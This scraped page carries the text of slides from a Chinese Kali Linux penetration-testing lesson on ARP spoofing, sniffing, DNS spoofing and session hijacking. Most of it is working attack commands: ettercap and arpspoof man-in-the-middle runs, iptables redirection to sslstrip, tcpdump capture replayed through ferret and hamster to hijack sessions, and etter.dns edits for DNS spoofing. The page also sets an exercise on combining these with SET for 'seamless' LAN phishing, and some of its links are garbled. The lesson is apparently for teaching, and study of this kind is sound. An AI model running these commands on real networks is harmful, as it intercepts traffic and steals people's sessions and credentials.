wKioL1RxuxaCmF41ABKIDzYOb6w72章节.pptxVIP

  • 1
  • 0
  • 约1.55千字
  • 约 14页
  • 2017-11-27 发布于广东
  • 举报
Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持玄魂交流qq群:303242737嗅探、arp欺骗、会话劫持1. google2. /xuanhun/archive/2009/01/05/1369828.htmlhttp:///xuanhun/archive/2009/01/05/1369828./xuanhun/archive/2009/01/05/1369828.html/xuanhun/archive/2009/04/22/1441274.htmlhttp:///xuanhun/archive/2009/04/22/1441274./xuanhun/archive/2009/04/22/1441274.html会话劫持的实现手段中间人攻击(arp欺骗,dns欺骗)注射式攻击Arp欺骗--ettercap参数说明:/4408.htmlhttp:///4408./4408.html2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf首先你要将ec_uid 、ec_gid都变为0,然后找到linux分类下的if you use iptables这一行,将注释(“#”号)去掉,打开转发。3./etc/NetworkManager/NetworkManager.conf 修改4.service network-manager restartArp欺骗--ettercap5.echo 1 /proc/sys/net/ipv4/ip_forward6. ettercap -i wlan0 -Tq -M arp:remote /0/ //Arp欺骗--arpspoofecho 1 /proc/sys/net/ipv4/ip_forwardarpspoof -i eth0 -t 32数据包捕获tcpdumpwiresharkdrafnet等其他自动化工具Ssl数据嗅探 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)sslstrip -p -l 10000 -w log.txt session劫持-arp欺骗tcpdump -i eth0 -w qq.capferret -r qq.caphamsterhttp://hamster/http://http://hamster/hamster选择目标测试session64位下ferret 安装dpkg --add-architecture i386apt-get clean apt-get update apt-get upgrade -y apt-get dist-upgrade -ysudo aptitude install ferret-sidejack:i386session劫持-DNS欺骗1. 使用 ettercap 进行arp欺骗2.修改etter.dns 文件/etc/ettercap/etter.dns3.启用dns_spoof课后练习结合前面课程中的 set 工具集, 我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?

文档评论(0)

1亿VIP精品文档

相关文档